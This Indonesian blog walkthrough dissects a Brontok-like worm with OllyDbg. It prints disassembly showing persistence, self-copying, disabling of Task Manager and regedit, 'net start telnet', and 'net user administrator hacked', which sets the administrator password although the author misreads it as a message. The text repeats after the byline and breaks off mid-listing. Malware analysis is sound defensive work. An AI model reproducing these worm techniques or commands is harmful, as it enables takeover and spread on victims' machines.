Bedah Virus w32.flashy@chris
Membedah virus bukan pekerjaan yang menakutkan. Mungkin sama saja seperti membedah orang, ya… tapi masih ada bedanya duonkkkkkkkk…. Kalo membedah, jika ada kesalahan pada pembedahannya … maka gak bisa di Undo kan…nah kalau membedah virus masih bisa di-Undo… yaitu dengan mem-backup system atau file – file yang penting di komputer anda…gunakan saja deep freeze, atau gunakan system restore-nya windows … gitu deh.
Nah sekarang kita akan mencoba membedah Virus w32.flashy@chris, yaitu virus brontok entah varian yang kesekian atau memang bukan brontok tetapi virus yang berkiblat ke sana. Kali ini virus tersebut tidak ditulis dengan vb melainkan C++. Dan di bungkus atau di-pack memakai FSG v2.0.
Sebelum membedah virus tersebut, mau tidak mau kita harus membuka pembungkus atau packer dari virus tersebut…ikuti langkah – langkah di bawah ini:
1. Ambil file contoh virus w32.flashy@chris
2. Nah untuk melihat virus tersebut dibungkus memakai apa, gunakan RDG Packer Detector, bisa didownload di groups.yahoo.com/group/virologi maka akan muncul gambar seperti di bawah ini:
3. Nah terlihat dengan jelas bahwa file virus memakai pembungkus FSG v2.0
4. Untuk meng-crack pembungkus tersebut cari aja di www.google.co.id dengan kata kunci ‘unFSG’, maka akan bermunculan unPacker virusnya, banyak kok
5. Kenapa harus di unpack? Soalnya kalau gak diunpack, gak akan keliahatan jika kita ingin melihat atau membongkar source code file virus tersebut.
6. Kemudian buka file virus memakai Ollydbg, maka akan kelihatan isi dari virus tersebut, menyerang di registry mana dan menelurkan file induk virus dengan nama apa saja.
PEMBEDAHAN ISI VIRUS BARIS AWAL
Coba lihat badan virus yang ada pada alamat 00401000 sampai 004010B4
00401000 $ 51 PUSH ECX
00401001 . 56 PUSH ESI
00401002 . 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
00401007 . 68 207B4000 PUSH Flashyun.00407B20 ; |PathBuffer = Flashyun.00407B20
0040100C . 6A 00 PUSH 0 ; |hModule = NULL
0040100E . FF15 1C604000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401014 . 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
00401019 . 68 247C4000 PUSH Flashyun.00407C24 ; |Buffer = Flashyun.00407C24
0040101E . FF15 18604000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
00401024 . 68 287D4000 PUSH Flashyun.00407D28 ; /Buffer = Flashyun.00407D28
00401029 . 68 04010000 PUSH 104 ; |BufSize = 104 (260.)
0040102E . FF15 14604000 CALL DWORD PTR DS:[<&KERNEL32.GetCurrent>; \GetCurrentDirectoryA
00401034 . 68 88704000 PUSH Flashyun.00407088 ; /MutexName = "||Flashy||"
00401039 . 6A 01 PUSH 1 ; |InitialOwner = TRUE
0040103B . 6A 00 PUSH 0 ; |pSecurity = NULL
0040103D . FF15 28604000 CALL DWORD PTR DS:[<&KERNEL32.CreateMute>; \CreateMutexA
00401043 . FF15 3C604000 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
00401049 . 3D B7000000 CMP EAX,0B7
0040104E . 75 0F JNZ SHORT Flashyun.0040105F
00401050 . E8 BB000000 CALL Flashyun.00401110
00401055 . 6A 00 PUSH 0 ; /ExitCode = 0
00401057 . FF15 40604000 CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess
0040105D . EB 05 JMP SHORT Flashyun.00401064
0040105F > E8 DC010000 CALL Flashyun.00401240
00401064 > 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00401068 . 50 PUSH EAX ; /pThreadId
00401069 . 6A 00 PUSH 0 ; |CreationFlags = 0
0040106B . 6A 00 PUSH 0 ; |pThreadParm = NULL
0040106D . 68 E0174000 PUSH Flashyun.004017E0 ; |ThreadFunction = Flashyun.004017E0
00401072 . 6A 00 PUSH 0 ; |StackSize = 0
00401074 . 6A 00 PUSH 0 ; |pSecurity = NULL
00401076 . FF15 44604000 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
0040107C . 8B35 EC604000 MOV ESI,DWORD PTR DS:[<&SHELL32.ShellExe>; SHELL32.ShellExecuteA
00401082 . 6A 00 PUSH 0 ; /IsShown = 0
00401084 . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
00401089 . 68 78704000 PUSH Flashyun.00407078 ; |Parameters = "start telnet"
0040108E . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
00401093 . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
00401098 . 6A 00 PUSH 0 ; |hWnd = NULL
0040109A . FFD6 CALL ESI ; \ShellExecuteA
0040109C . 6A 00 PUSH 0 ; /IsShown = 0
0040109E . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
004010A3 . 68 4C704000 PUSH Flashyun.0040704C ; |Parameters = "user administrator hacked"
004010A8 . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
004010AD . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
004010B2 . 6A 00 PUSH 0 ; |hWnd = NULL
004010B4 . FFD6 CALL ESI ; \ShellExecuteA
Dapat dilihat di alamat 00401034 ada tulisan MutexName = "||Flashy||" Di situ nama file viru stersebut adalah flashy atau flag-nya adalah flashy. Nah dari situ kalian dapat memberi nama virus tersebut adalah flashy terserah w32.flashy atau worm.flahsy atau virus.flashy terserah lah…… coba lihat Pada baris
00401089 . 68 78704000 PUSH Flashyun.00407078 ; |Parameters = "start telnet"
0040108E . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
00401093 . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
00401098 . 6A 00 PUSH 0 ; |hWnd = NULL
0040109A . FFD6 CALL ESI ; \ShellExecuteA
0040109C . 6A 00 PUSH 0 ; /IsShown = 0
0040109E . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
004010A3 . 68 4C704000 PUSH Flashyun.0040704C ; |Parameters = "user administrator hacked"
004010A8 . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
004010AD . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
004010B2 . 6A 00 PUSH 0 ; |hWnd = NULL
004010B4 . FFD6 CALL ESI ; \ShellExecuteA
Nah disini virus menjalankan file system windows bernama net.exe dan memberi pesan ke administrator bahwa user administrator hacked, sepertinya virus mencoba masuk ke sistem dan menghacking user administrator.
BARIS PENCARIAN DRIVE
Nah baris pencarian drive virus sendiri ada di sini nih:
004010C3 . 68 48704000 PUSH Flashyun.00407048 ; ASCII "d:"
004010C8 . E8 B3060000 CALL Flashyun.00401780
004010CD . 68 44704000 PUSH Flashyun.00407044 ; ASCII "e:"
004010D2 . E8 A9060000 CALL Flashyun.00401780
004010D7 . 68 40704000 PUSH Flashyun.00407040 ; ASCII "f:"
004010DC . E8 9F060000 CALL Flashyun.00401780
004010E1 . 68 3C704000 PUSH Flashyun.0040703C ; ASCII "g:"
004010E6 . E8 95060000 CALL Flashyun.00401780
004010EB . 68 38704000 PUSH Flashyun.00407038 ; ASCII "h:"
004010F0 . E8 8B060000 CALL Flashyun.00401780
004010F5 . 68 34704000 PUSH Flashyun.00407034 ; ASCII "i:"
004010FA . E8 81060000 CALL Flashyun.00401780
004010FF . 68 30704000 PUSH Flashyun.00407030 ; ASCII "j:"
00401104 . E8 77060000 CALL Flashyun.00401780
Sedangkan untuk mencari jenis drive, virus menjalankan perintah berikut:
004011D8 |. 50 PUSH EAX ; /RootPathName
004011D9 |. FF15 20604000 CALL DWORD PTR DS:[<&KERNEL32.GetDriveTy>; \GetDriveTypeA
BARIS MANIPULASI REGISTRY WINDOWS
Nah kalau dibawah ini si virus menulis registry windows di alamat HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Explorer dengan value “Logon User Name” yang berguna untuk membuat user login
00401384 |. 53 PUSH EBX ; |Reserved => 0
00401385 |. 8B35 0C604000 MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; |ADVAPI32.RegOpenKeyExA
0040138B |. 68 08714000 PUSH Flashyun.00407108 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Explorer"
00401390 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
00401395 |. FFD6 CALL ESI ; \RegOpenKeyExA
00401397 |. 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
0040139B |. 8D4C24 44 LEA ECX,DWORD PTR SS:[ESP+44]
0040139F |. 8D9424 4C01000>LEA EDX,DWORD PTR SS:[ESP+14C]
004013A6 |. 51 PUSH ECX ; /pBufSize
004013A7 |. 52 PUSH EDX ; |Buffer
004013A8 |. 53 PUSH EBX ; |pValueType => NULL
004013A9 |. 53 PUSH EBX ; |Reserved => NULL
004013AA |. 68 F8704000 PUSH Flashyun.004070F8 ; |ValueName = "Logon User Name"
004013AF |. 50 PUSH EAX ; |hKey
004013B0 |. FF15 00604000 CALL DWORD PTR DS:[<&ADVAPI32.RegQueryVa>; \RegQueryValueExA
Pada baris ini juga virus memanipulasi registry windows untuk memaksa menjalankan file flashy.exe ketika windows berjalan pertama kali:
00401476 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
0040147B |. 50 PUSH EAX ; |Buffer
0040147C |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
0040147E |. 53 PUSH EBX ; |Reserved
0040147F |. 68 98704000 PUSH Flashyun.00407098 ; |ValueName = "Flashy Bot"
00401484 |. 51 PUSH ECX ; |hKey
00401485 |. FF15 04604000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
0040148B |. 8B5424 10 MOV EDX,DWORD PTR SS:[ESP+10]
0040148F |. 52 PUSH EDX ; /hKey
00401490 |. FF15 08604000 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
BARIS PEMICU FILE
Nah untuk penggandaan, virus akan menjalankan file di bawah ini, yaitu dengan cara menyalin file systemID.pif ke
"%s\Documents and Settings\%s\Start Menu\Programs\Startup\systemID.pif dimana %s adalah user yang ada di windows dan drive dimana windows terinstall.
004013DB |. 68 B0704000 PUSH Flashyun.004070B0 ; ASCII "%s\Documents and Settings\%s\Start Menu\Programs\Startup\systemID.pif"
004013E0 |. 51 PUSH ECX
004013E1 |. E8 48060000 CALL Flashyun.00401A2E
004013E6 |. 8B3D 2C604000 MOV EDI,DWORD PTR DS:[<&KERNEL32.CopyFil>; kernel32.CopyFileA
004013EC |. 83C4 1C ADD ESP,1C
004013EF |. 8D9424 5002000>LEA EDX,DWORD PTR SS:[ESP+250]
004013F6 |. 53 PUSH EBX ; /FailIfExists
004013F7 |. 52 PUSH EDX ; |NewFileName
004013F8 |. 68 207B4000 PUSH Flashyun.00407B20 ; |ExistingFileName = ""
004013FD |. FFD7 CALL EDI ; \CopyFileA
Nah pada baris berikut ini adalah baris dimana virus akan men-cek apakah file induknya telah ada di c:\Windows\System32 atau belum, jika belum ada maka virus mengkopi file induk bernama flashy.exe ke c:\Windows\System32 dan men-set atribut file tersebut adalah hidden, sehingga mereka tidak mengetahui dimana letak file induk virus
00401431 |. 68 A4704000 PUSH Flashyun.004070A4 ; /StringToAdd = "\Flashy.exe"
00401436 |. 51 PUSH ECX ; |ConcatString
00401437 |. FF15 48604000 CALL DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; \lstrcatA
0040143D |. 8D5424 48 LEA EDX,DWORD PTR SS:[ESP+48]
00401441 |. 53 PUSH EBX
00401442 |. 52 PUSH EDX
00401443 |. 68 207B4000 PUSH Flashyun.00407B20
00401448 |. FFD7 CALL EDI
0040144A |. 8D4424 48 LEA EAX,DWORD PTR SS:[ESP+48]
0040144E |. 6A 02 PUSH 2 ; /FileAttributes = HIDDEN
00401450 |. 50 PUSH EAX ; |FileName
00401451 |. FF15 24604000 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
Di baris ini si virus melakukan pencarian terhadap folder yang akan ditulari oleh file virus. Maksudnya mengcopy ke dalam folder tersebut file virus yang diberi nama sesuai dengan nama folder tersebut
00401504 |. BF 44714000 MOV EDI,Flashyun.00407144 ; ASCII "\*.*"
00401509 |. 83C9 FF OR ECX,FFFFFFFF
0040150C |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040150E |. F7D1 NOT ECX
00401510 |. 2BF9 SUB EDI,ECX
00401512 |. 8BF7 MOV ESI,EDI
00401514 |. 8BD9 MOV EBX,ECX
00401516 |. 8BFA MOV EDI,EDX
00401518 |. 83C9 FF OR ECX,FFFFFFFF
0040151B |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040151D |. 8BCB MOV ECX,EBX
0040151F |. 4F DEC EDI
00401520 |. C1E9 02 SHR ECX,2
00401523 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401525 |. 8BCB MOV ECX,EBX
00401527 |. 8D8424 1801000>LEA EAX,DWORD PTR SS:[ESP+118]
0040152E |. 83E1 03 AND ECX,3
00401531 |. 50 PUSH EAX ; /pFindFileData
00401532 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
00401534 |. 8D8C24 5C02000>LEA ECX,DWORD PTR SS:[ESP+25C] ; |
0040153B |. 51 PUSH ECX ; |FileName
0040153C |. FF15 38604000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstF>; \FindFirstFileA
00401542 |. 8B1D 4C604000 MOV EBX,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
00401548 |. 8B2D 24604000 MOV EBP,DWORD PTR DS:[<&KERNEL32.SetFile>; kernel32.SetFileAttributesA
0040154E |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX
BARIS PENGGANDAAN FILE
Pada baris berikut virus melakukan penggandaan file yang ada di tiap – tiap folder. Misalnya anda mempunyai folder bernama buah dan di dalam folder buah ada folder pisang, apel dan cerry. Maka di tiap – tiap folder akan ada file virus sesuai nama foldernya, jadi di folder buah ada file bernama buah.exe, di folder pisang ada file virus bernama pisang.exe dan di folder apel dan cerry ada file bernama apel.exe dan cerry.exe…
00401710 |. 68 4C714000 PUSH Flashyun.0040714C ; ASCII "\%s.exe"
00401715 |. 52 PUSH EDX
00401716 |. E8 13030000 CALL Flashyun.00401A2E
0040171B |. 8DBC24 1C01000>LEA EDI,DWORD PTR SS:[ESP+11C]
00401722 |. 83C9 FF OR ECX,FFFFFFFF
00401725 |. 33C0 XOR EAX,EAX
00401727 |. 83C4 0C ADD ESP,0C
0040172A |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040172C |. F7D1 NOT ECX
0040172E |. 2BF9 SUB EDI,ECX
00401730 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
00401734 |. 8BF7 MOV ESI,EDI
00401736 |. 8BD9 MOV EBX,ECX
00401738 |. 8BFA MOV EDI,EDX
0040173A |. 83C9 FF OR ECX,FFFFFFFF
0040173D |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040173F |. 8BCB MOV ECX,EBX
00401741 |. 4F DEC EDI
00401742 |. C1E9 02 SHR ECX,2
00401745 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401747 |. 8BCB MOV ECX,EBX
00401749 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0040174D |. 83E1 03 AND ECX,3
00401750 |. 6A 01 PUSH 1 ; /FailIfExists = TRUE
00401752 |. 50 PUSH EAX ; |NewFileName
00401753 |. 68 207B4000 PUSH Flashyun.00407B20 ; |ExistingFileName = ""
00401758 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
0040175A |. FF15 2C604000 CALL DWORD PTR DS:[<&KERNEL32.CopyFileA>>; \CopyFileA
00401760 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
00401764 |. 6A 01 PUSH 1 ; /FileAttributes = READONLY
00401766 |. 51 PUSH ECX ; |FileName
00401767 |. FF15 24604000 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
BARIS KODE PERTAHANAN
Nah virus menjalankan baris pertahanan dengan cara menulisi registry windows di alamat tertentu, misalnya pada baris berikut, virus akan menulis di registry windows pada alamat :
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
Yang berguna untuk mengunci regedit dan ctrl+alt+del
0040181A . 68 5C724000 PUSH Flashyun.0040725C ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System"
0040181F . 68 01000080 PUSH 80000001
00401824 . FFD7 CALL EDI
00401826 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0040182A . 6A 04 PUSH 4
0040182C . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
00401830 . 51 PUSH ECX
00401831 . 6A 04 PUSH 4
00401833 . 6A 00 PUSH 0
00401835 . 68 44724000 PUSH Flashyun.00407244 ; ASCII "DisableRegistryTools"
0040183A . 52 PUSH EDX
0040183B . FFD6 CALL ESI
0040183D . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00401841 . 6A 04 PUSH 4
00401843 . 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14]
00401847 . 50 PUSH EAX
00401848 . 6A 04 PUSH 4
0040184A . 6A 00 PUSH 0
0040184C . 68 34724000 PUSH Flashyun.00407234 ; ASCII "DisableTaskMgr"
Dan untuk menyembunyikan folder option virus menjalankan atau menulisi registry windows di alamat:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
00401867 . 68 F8714000 PUSH Flashyun.004071F8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
0040186C . 68 01000080 PUSH 80000001
00401871 . FFD7 CALL EDI
00401873 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
00401877 . 6A 04 PUSH 4
00401879 . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
0040187D . 51 PUSH ECX
0040187E . 6A 04 PUSH 4
00401880 . 6A 00 PUSH 0
00401882 . 68 E8714000 PUSH Flashyun.004071E8 ; ASCII "NoFolderOptions"
Untuk menyembunyikan ekstensi file dan menyembunyikan file beratribut hidden yang ada di registry windows dan alamat:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, HidefileExt
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, Hidden
Virus menjalankan kode baris berikut ini:
0040189D . 68 AC714000 PUSH Flashyun.004071AC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
004018A2 . 68 01000080 PUSH 80000001
004018A7 . FFD7 CALL EDI
004018A9 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
004018AD . 6A 04 PUSH 4
004018AF . 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
004018B3 . 52 PUSH EDX
004018B4 . 6A 04 PUSH 4
004018B6 . 6A 00 PUSH 0
004018B8 . 68 A0714000 PUSH Flashyun.004071A0 ; ASCII "HideFileExt"
004018BD . 50 PUSH EAX
004018BE . FFD6 CALL ESI
004018C0 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
004018C4 . 6A 04 PUSH 4
004018C6 . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
004018CA . 51 PUSH ECX
004018CB . 6A 04 PUSH 4
004018CD . 6A 00 PUSH 0
004018CF . 68 98714000 PUSH Flashyun.00407198 ; ASCII "Hidden"
Sedangkan untuk melakukan sharing direktori windows yang terbuka pada alamat registry:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess, Start
Virus menjalankan script dibawah ini:
004018FA . 68 68714000 PUSH Flashyun.00407168 ; ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess"
004018FF . 68 02000080 PUSH 80000002
00401904 . FFD7 CALL EDI
00401906 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040190A . 6A 04 PUSH 4
0040190C . 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00401910 . 52 PUSH EDX
00401911 . 6A 04 PUSH 4
00401913 . 6A 00 PUSH 0
00401915 . 68 60714000 PUSH Flashyun.00407160 ; ASCII "Start"
Posted on 00.11 by aZi and filed under
Hacking Tutorial
| 0 Comments »
Nah sekarang kita akan mencoba membedah Virus w32.flashy@chris, yaitu virus brontok entah varian yang kesekian atau memang bukan brontok tetapi virus yang berkiblat ke sana. Kali ini virus tersebut tidak ditulis dengan vb melainkan C++. Dan di bungkus atau di-pack memakai FSG v2.0.
Sebelum membedah virus tersebut, mau tidak mau kita harus membuka pembungkus atau packer dari virus tersebut…ikuti langkah – langkah di bawah ini:
1. Ambil file contoh virus w32.flashy@chris
2. Nah untuk melihat virus tersebut dibungkus memakai apa, gunakan RDG Packer Detector, bisa didownload di groups.yahoo.com/group/virologi maka akan muncul gambar seperti di bawah ini:
3. Nah terlihat dengan jelas bahwa file virus memakai pembungkus FSG v2.0
4. Untuk meng-crack pembungkus tersebut cari aja di www.google.co.id dengan kata kunci ‘unFSG’, maka akan bermunculan unPacker virusnya, banyak kok
5. Kenapa harus di unpack? Soalnya kalau gak diunpack, gak akan keliahatan jika kita ingin melihat atau membongkar source code file virus tersebut.
6. Kemudian buka file virus memakai Ollydbg, maka akan kelihatan isi dari virus tersebut, menyerang di registry mana dan menelurkan file induk virus dengan nama apa saja.
PEMBEDAHAN ISI VIRUS BARIS AWAL
Coba lihat badan virus yang ada pada alamat 00401000 sampai 004010B4
00401000 $ 51 PUSH ECX
00401001 . 56 PUSH ESI
00401002 . 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
00401007 . 68 207B4000 PUSH Flashyun.00407B20 ; |PathBuffer = Flashyun.00407B20
0040100C . 6A 00 PUSH 0 ; |hModule = NULL
0040100E . FF15 1C604000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401014 . 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
00401019 . 68 247C4000 PUSH Flashyun.00407C24 ; |Buffer = Flashyun.00407C24
0040101E . FF15 18604000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
00401024 . 68 287D4000 PUSH Flashyun.00407D28 ; /Buffer = Flashyun.00407D28
00401029 . 68 04010000 PUSH 104 ; |BufSize = 104 (260.)
0040102E . FF15 14604000 CALL DWORD PTR DS:[<&KERNEL32.GetCurrent>; \GetCurrentDirectoryA
00401034 . 68 88704000 PUSH Flashyun.00407088 ; /MutexName = "||Flashy||"
00401039 . 6A 01 PUSH 1 ; |InitialOwner = TRUE
0040103B . 6A 00 PUSH 0 ; |pSecurity = NULL
0040103D . FF15 28604000 CALL DWORD PTR DS:[<&KERNEL32.CreateMute>; \CreateMutexA
00401043 . FF15 3C604000 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
00401049 . 3D B7000000 CMP EAX,0B7
0040104E . 75 0F JNZ SHORT Flashyun.0040105F
00401050 . E8 BB000000 CALL Flashyun.00401110
00401055 . 6A 00 PUSH 0 ; /ExitCode = 0
00401057 . FF15 40604000 CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess
0040105D . EB 05 JMP SHORT Flashyun.00401064
0040105F > E8 DC010000 CALL Flashyun.00401240
00401064 > 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00401068 . 50 PUSH EAX ; /pThreadId
00401069 . 6A 00 PUSH 0 ; |CreationFlags = 0
0040106B . 6A 00 PUSH 0 ; |pThreadParm = NULL
0040106D . 68 E0174000 PUSH Flashyun.004017E0 ; |ThreadFunction = Flashyun.004017E0
00401072 . 6A 00 PUSH 0 ; |StackSize = 0
00401074 . 6A 00 PUSH 0 ; |pSecurity = NULL
00401076 . FF15 44604000 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
0040107C . 8B35 EC604000 MOV ESI,DWORD PTR DS:[<&SHELL32.ShellExe>; SHELL32.ShellExecuteA
00401082 . 6A 00 PUSH 0 ; /IsShown = 0
00401084 . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
00401089 . 68 78704000 PUSH Flashyun.00407078 ; |Parameters = "start telnet"
0040108E . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
00401093 . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
00401098 . 6A 00 PUSH 0 ; |hWnd = NULL
0040109A . FFD6 CALL ESI ; \ShellExecuteA
0040109C . 6A 00 PUSH 0 ; /IsShown = 0
0040109E . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
004010A3 . 68 4C704000 PUSH Flashyun.0040704C ; |Parameters = "user administrator hacked"
004010A8 . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
004010AD . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
004010B2 . 6A 00 PUSH 0 ; |hWnd = NULL
004010B4 . FFD6 CALL ESI ; \ShellExecuteA
Dapat dilihat di alamat 00401034 ada tulisan MutexName = "||Flashy||" Di situ nama file viru stersebut adalah flashy atau flag-nya adalah flashy. Nah dari situ kalian dapat memberi nama virus tersebut adalah flashy terserah w32.flashy atau worm.flahsy atau virus.flashy terserah lah…… coba lihat Pada baris
00401089 . 68 78704000 PUSH Flashyun.00407078 ; |Parameters = "start telnet"
0040108E . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
00401093 . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
00401098 . 6A 00 PUSH 0 ; |hWnd = NULL
0040109A . FFD6 CALL ESI ; \ShellExecuteA
0040109C . 6A 00 PUSH 0 ; /IsShown = 0
0040109E . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
004010A3 . 68 4C704000 PUSH Flashyun.0040704C ; |Parameters = "user administrator hacked"
004010A8 . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
004010AD . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
004010B2 . 6A 00 PUSH 0 ; |hWnd = NULL
004010B4 . FFD6 CALL ESI ; \ShellExecuteA
Nah disini virus menjalankan file system windows bernama net.exe dan memberi pesan ke administrator bahwa user administrator hacked, sepertinya virus mencoba masuk ke sistem dan menghacking user administrator.
BARIS PENCARIAN DRIVE
Nah baris pencarian drive virus sendiri ada di sini nih:
004010C3 . 68 48704000 PUSH Flashyun.00407048 ; ASCII "d:"
004010C8 . E8 B3060000 CALL Flashyun.00401780
004010CD . 68 44704000 PUSH Flashyun.00407044 ; ASCII "e:"
004010D2 . E8 A9060000 CALL Flashyun.00401780
004010D7 . 68 40704000 PUSH Flashyun.00407040 ; ASCII "f:"
004010DC . E8 9F060000 CALL Flashyun.00401780
004010E1 . 68 3C704000 PUSH Flashyun.0040703C ; ASCII "g:"
004010E6 . E8 95060000 CALL Flashyun.00401780
004010EB . 68 38704000 PUSH Flashyun.00407038 ; ASCII "h:"
004010F0 . E8 8B060000 CALL Flashyun.00401780
004010F5 . 68 34704000 PUSH Flashyun.00407034 ; ASCII "i:"
004010FA . E8 81060000 CALL Flashyun.00401780
004010FF . 68 30704000 PUSH Flashyun.00407030 ; ASCII "j:"
00401104 . E8 77060000 CALL Flashyun.00401780
Sedangkan untuk mencari jenis drive, virus menjalankan perintah berikut:
004011D8 |. 50 PUSH EAX ; /RootPathName
004011D9 |. FF15 20604000 CALL DWORD PTR DS:[<&KERNEL32.GetDriveTy>; \GetDriveTypeA
BARIS MANIPULASI REGISTRY WINDOWS
Nah kalau dibawah ini si virus menulis registry windows di alamat HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Explorer dengan value “Logon User Name” yang berguna untuk membuat user login
00401384 |. 53 PUSH EBX ; |Reserved => 0
00401385 |. 8B35 0C604000 MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; |ADVAPI32.RegOpenKeyExA
0040138B |. 68 08714000 PUSH Flashyun.00407108 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Explorer"
00401390 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
00401395 |. FFD6 CALL ESI ; \RegOpenKeyExA
00401397 |. 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
0040139B |. 8D4C24 44 LEA ECX,DWORD PTR SS:[ESP+44]
0040139F |. 8D9424 4C01000>LEA EDX,DWORD PTR SS:[ESP+14C]
004013A6 |. 51 PUSH ECX ; /pBufSize
004013A7 |. 52 PUSH EDX ; |Buffer
004013A8 |. 53 PUSH EBX ; |pValueType => NULL
004013A9 |. 53 PUSH EBX ; |Reserved => NULL
004013AA |. 68 F8704000 PUSH Flashyun.004070F8 ; |ValueName = "Logon User Name"
004013AF |. 50 PUSH EAX ; |hKey
004013B0 |. FF15 00604000 CALL DWORD PTR DS:[<&ADVAPI32.RegQueryVa>; \RegQueryValueExA
Pada baris ini juga virus memanipulasi registry windows untuk memaksa menjalankan file flashy.exe ketika windows berjalan pertama kali:
00401476 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
0040147B |. 50 PUSH EAX ; |Buffer
0040147C |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
0040147E |. 53 PUSH EBX ; |Reserved
0040147F |. 68 98704000 PUSH Flashyun.00407098 ; |ValueName = "Flashy Bot"
00401484 |. 51 PUSH ECX ; |hKey
00401485 |. FF15 04604000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
0040148B |. 8B5424 10 MOV EDX,DWORD PTR SS:[ESP+10]
0040148F |. 52 PUSH EDX ; /hKey
